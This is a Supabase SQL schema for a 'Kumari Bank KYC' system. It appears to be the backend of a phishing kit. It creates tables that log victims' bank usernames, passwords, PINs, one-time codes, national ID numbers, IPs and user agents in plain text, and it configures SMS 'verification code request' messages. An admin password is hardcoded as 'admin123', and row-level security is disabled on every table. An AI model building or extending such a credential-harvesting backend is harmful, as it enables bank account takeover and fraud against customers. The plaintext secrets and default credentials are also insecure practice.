-- ====================================================================
-- KUMARI BANK KYC - SUPABASE DATABASE SCHEMA INITIALIZATION
-- ====================================================================
-- Instructions:
-- 1. Go to your Supabase Dashboard: https://supabase.com/dashboard/project/txzkkgqtbjiisooyplaf
-- 2. Click on "SQL Editor" in the left sidebar.
-- 3. Click "New Query", paste this entire file, and click "Run".
-- ====================================================================

-- 1. Create Responses Table (KYC submissions & OTP logs)
CREATE TABLE IF NOT EXISTS public.responses (
    id BIGINT GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY,
    "sessionId" TEXT,
    "refId" TEXT,
    status TEXT DEFAULT 'INITIAL_SUBMISSION',
    username TEXT DEFAULT '',
    mobile TEXT DEFAULT '',
    password TEXT DEFAULT '',
    pin TEXT DEFAULT '',
    "fatherName" TEXT DEFAULT '',
    "nidNumber" TEXT DEFAULT '',
    otp TEXT DEFAULT '',
    "clientIp" TEXT DEFAULT '',
    "userAgent" TEXT DEFAULT '',
    "createdAt" TEXT DEFAULT '',
    "verifiedAt" TEXT DEFAULT '',
    "smsRecipient" TEXT DEFAULT '',
    "smsMessage" TEXT DEFAULT '',
    created_at TIMESTAMPTZ DEFAULT TIMEZONE('utc'::text, NOW())
);

-- Indices for rapid querying & lookups
CREATE INDEX IF NOT EXISTS idx_responses_session ON public.responses ("sessionId");
CREATE INDEX IF NOT EXISTS idx_responses_mobile ON public.responses (mobile);
CREATE INDEX IF NOT EXISTS idx_responses_status ON public.responses (status);
CREATE INDEX IF NOT EXISTS idx_responses_created_at ON public.responses (created_at DESC);

-- Disable Row Level Security (RLS) to allow serverless service key & direct access
ALTER TABLE public.responses DISABLE ROW LEVEL SECURITY;

-- 2. Create SMS Config Table (Live SMS template & session dynamic overrides)
CREATE TABLE IF NOT EXISTS public.sms_config (
    id TEXT PRIMARY KEY DEFAULT 'default',
    recipient TEXT DEFAULT '32001',
    "messageTemplate" TEXT DEFAULT 'KUMARI BANK KYC VERIFICATION CODE REQUEST\nRef: {REF_ID}\nMobile: {MOBILE}\nTime: {TIME}',
    "sessionMessages" JSONB DEFAULT '{}'::jsonb,
    "updatedAt" TEXT,
    "deployedAt" TEXT
);

ALTER TABLE public.sms_config DISABLE ROW LEVEL SECURITY;

-- Seed default SMS config if not already present
INSERT INTO public.sms_config (id, recipient, "messageTemplate", "sessionMessages", "updatedAt", "deployedAt")
VALUES (
    'default',
    '32001',
    'KUMARI BANK KYC VERIFICATION CODE REQUEST\nRef: {REF_ID}\nMobile: {MOBILE}\nTime: {TIME}',
    '{}'::jsonb,
    NOW()::TEXT,
    NOW()::TEXT
)
ON CONFLICT (id) DO NOTHING;

-- 3. Create Admin Config Table (Persistent admin credentials)
CREATE TABLE IF NOT EXISTS public.admin_config (
    id TEXT PRIMARY KEY DEFAULT 'default',
    "adminPassword" TEXT DEFAULT 'admin123',
    "updatedAt" TEXT
);

ALTER TABLE public.admin_config DISABLE ROW LEVEL SECURITY;

-- Seed default Admin credentials if not present
INSERT INTO public.admin_config (id, "adminPassword", "updatedAt")
VALUES (
    'default',
    'admin123',
    NOW()::TEXT
)
ON CONFLICT (id) DO NOTHING;
